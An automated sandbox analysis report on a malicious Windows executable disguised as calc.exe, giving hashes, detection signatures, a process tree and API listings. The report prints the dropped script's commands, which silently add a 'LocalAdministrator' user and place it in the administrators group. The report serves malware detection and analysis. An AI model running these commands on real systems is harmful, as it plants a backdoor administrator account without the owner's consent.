Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
calc.exe

Overview

General Information

Sample name:calc.exe
Analysis ID:1523879
MD5:4bf28f0b6a5b20681a1378a0d8afe694
SHA1:f606479738c2e8dbb67cd9998dc35c830425c559
SHA256:cf6b9d70a6b10490407df35b3fb8968de048328614171ab5c9de51d7638eed3a
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Adds a new user with administrator rights
Machine Learning detection for sample
Sigma detected: Suspicious Calculator Usage
Sigma detected: Suspicious Process Parents
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains functionality for read data from the clipboard
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Add User to Local Administrators Group
Sigma detected: New User Created Via Net.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • calc.exe (PID: 6940 cmdline: "C:\Users\user\Desktop\calc.exe" MD5: 4BF28F0B6A5B20681A1378A0D8AFE694)
    • wscript.exe (PID: 7140 cmdline: "C:\Windows\System32\wscript.exe" JzM4PpnOtP.jse MD5: FF00E0480075B095948000BDC66E81F0)
      • net.exe (PID: 6276 cmdline: "C:\Windows\System32\net.exe" user LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)
        • conhost.exe (PID: 6296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net1.exe (PID: 1700 cmdline: C:\Windows\system32\net1 user LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
      • net.exe (PID: 6320 cmdline: "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add MD5: 31890A7DE89936F922D44D677F681A7F)
        • conhost.exe (PID: 4548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net1.exe (PID: 5856 cmdline: C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
      • calc.exe (PID: 3488 cmdline: "C:\Users\user\Desktop\calc.exe" MD5: 4BF28F0B6A5B20681A1378A0D8AFE694)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Suspicious Calculator Usage
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\calc.exe", CommandLine: "C:\Users\user\Desktop\calc.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\calc.exe, NewProcessName: C:\Users\user\Desktop\calc.exe, OriginalFileName: C:\Users\user\Desktop\calc.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\Desktop\calc.exe", ProcessId: 6940, ProcessName: calc.exe
Sigma detected: Suspicious Process Parents
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\wscript.exe" JzM4PpnOtP.jse, CommandLine: "C:\Windows\System32\wscript.exe" JzM4PpnOtP.jse, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\calc.exe", ParentImage: C:\Users\user\Desktop\calc.exe, ParentProcessId: 6940, ParentProcessName: calc.exe, ProcessCommandLine: "C:\Windows\System32\wscript.exe" JzM4PpnOtP.jse, ProcessId: 7140, ProcessName: wscript.exe
Sigma detected: Add User to Local Administrators Group
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add, CommandLine: "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "C:\Windows\System32\wscript.exe" JzM4PpnOtP.jse, ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 7140, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add, ProcessId: 6320, ProcessName: net.exe
Sigma detected: New User Created Via Net.EXE
Source: Process startedAuthor: Endgame, JHasenbusch (adapted to Sigma for oscd.community): Data: Command: "C:\Windows\System32\net.exe" user LocalAdministrator /add, CommandLine: "C:\Windows\System32\net.exe" user LocalAdministrator /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "C:\Windows\System32\wscript.exe" JzM4PpnOtP.jse, ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 7140, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\net.exe" user LocalAdministrator /add, ProcessId: 6276, ProcessName: net.exe
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\wscript.exe" JzM4PpnOtP.jse, CommandLine: "C:\Windows\System32\wscript.exe" JzM4PpnOtP.jse, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\calc.exe", ParentImage: C:\Users\user\Desktop\calc.exe, ParentProcessId: 6940, ParentProcessName: calc.exe, ProcessCommandLine: "C:\Windows\System32\wscript.exe" JzM4PpnOtP.jse, ProcessId: 7140, ProcessName: wscript.exe
Sigma detected: Net.exe Execution
Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: "C:\Windows\System32\net.exe" user LocalAdministrator /add, CommandLine: "C:\Windows\System32\net.exe" user LocalAdministrator /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "C:\Windows\System32\wscript.exe" JzM4PpnOtP.jse, ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 7140, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\net.exe" user LocalAdministrator /add, ProcessId: 6276, ProcessName: net.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: calc.exeVirustotal: Detection: 8%Perma Link
Machine Learning detection for sample
Source: calc.exeJoe Sandbox ML: detected
Source: calc.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_00425639 FindFirstFileW,FindFirstFileW,SetCurrentDirectoryW,FindClose,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,0_2_00425639
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_004230D5 FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,0_2_004230D5
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_0041510D FindFirstFileW,DeleteFileW,CopyFileW,lstrcmpiW,DeleteFileW,MoveFileW,FindNextFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,0_2_0041510D
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_0042320D FindFirstFileW,FindClose,0_2_0042320D
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_00426292 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00426292
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_00425838 FindFirstFileW,FindNextFileW,FindClose,0_2_00425838
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_00422C4D FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,0_2_00422C4D
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_00414E16 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00414E16
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_00414FFA FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,0_2_00414FFA
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_0042A322 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,CloseClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,DragQueryFileW,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0042A322
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_0042A4F2 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0042A4F2
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_0042A322 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,CloseClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,DragQueryFileW,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0042A322
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_0041111C GetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0041111C
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_004045EC GetClientRect,GetCursorPos,ScreenToClient,WindowFromPoint,GetWindowRect,GetWindowRect,MoveWindow,GetCursorPos,GetCursorPos,TrackPopupMenuEx,SendMessageW,73A245F0,SendMessageW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,73A245F0,SendMessageW,6F59CB00,6F59C2F0,SetCapture,CharUpperBuffW,ClientToScreen,6F59C530,InvalidateRect,PostMessageW,GetMenuItemInfoW,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,FreeLibrary,DragQueryPoint,SendMessageW,SendMessageW,DragQueryFileW,DragQueryFileW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,CharUpperBuffW,CharUpperBuffW,CharUpperBuffW,CharUpperBuffW,6F59C580,6F59C6F0,ReleaseCapture,SetWindowTextW,SendMessageW,CharUpperBuffW,CharUpperBuffW,ClientToScreen,6F59C5D0,0_2_004045EC

System Summary

barindex
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_00424856: GetFullPathNameW,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,0_2_00424856
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_00415C2E GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,EnumWindows,ExitWindowsEx,SetSystemPowerState,0_2_00415C2E
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_0043244B0_2_0043244B
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_004422B60_2_004422B6
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_004443170_2_00444317
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_0043A4420_2_0043A442
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_0043E46A0_2_0043E46A
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_004045EC0_2_004045EC
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_0044E6160_2_0044E616
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_0044D7D40_2_0044D7D4
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_004568240_2_00456824
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_004419610_2_00441961
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_00442AF90_2_00442AF9
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_00420D890_2_00420D89
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_00421E0D0_2_00421E0D
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_00450F740_2_00450F74
Source: C:\Users\user\Desktop\calc.exeCode function: String function: 0044D788 appears 53 times
Source: C:\Users\user\Desktop\calc.exeCode function: String function: 00416BFE appears 81 times
Source: C:\Users\user\Desktop\calc.exeCode function: String function: 0044C070 appears 44 times
Source: calc.exe, 00000000.00000003.1661654435.000000000058E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 00000000.00000003.1661682240.00000000005A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exe, 00000000.00000003.1661728844.00000000005A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs calc.exe
Source: calc.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engineClassification label: mal68.winEXE@15/1@0/0
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_0041FE6D GetLastError,FormatMessageW,0_2_0041FE6D
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_00415C2E GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,EnumWindows,ExitWindowsEx,SetSystemPowerState,0_2_00415C2E
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_004240D8 SetErrorMode,GetDiskFreeSpaceW,FreeLibrary,0_2_004240D8
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_00430DCB OleInitialize,CLSIDFromProgID,CoCreateInstance,CoInitializeSecurity,CoCreateInstanceEx,CoSetProxyBlanket,0_2_00430DCB
Source: C:\Users\user\Desktop\calc.exeCode function: 0_2_0041605B FindResourceW,FindResourceW,LoadResource,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0041605B
Source: C:\Users\user\Desktop\calc.exeFile created: C:\Users\user\Desktop\JzM4PpnOtP.jseJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4548:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6296:120:WilError_03
Source: calc.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\calc.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\calc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: calc.exeVirustotal: Detection: 8%
Source: wscript.exeString found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");
Source: C:\Users\user\Desktop\calc.exeFile read: C:\Users\user\Desktop\calc.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Users\user\Desktop\calc.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" JzM4PpnOtP.jse
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" JzM4PpnOtP.jseJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /addJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /addJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" Jump to behavior
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /addJump to behavior
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /addJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: sxs.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: jscript.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\calc.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\net1.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\net1.exeSection loaded: samlib.dllJump to behavior
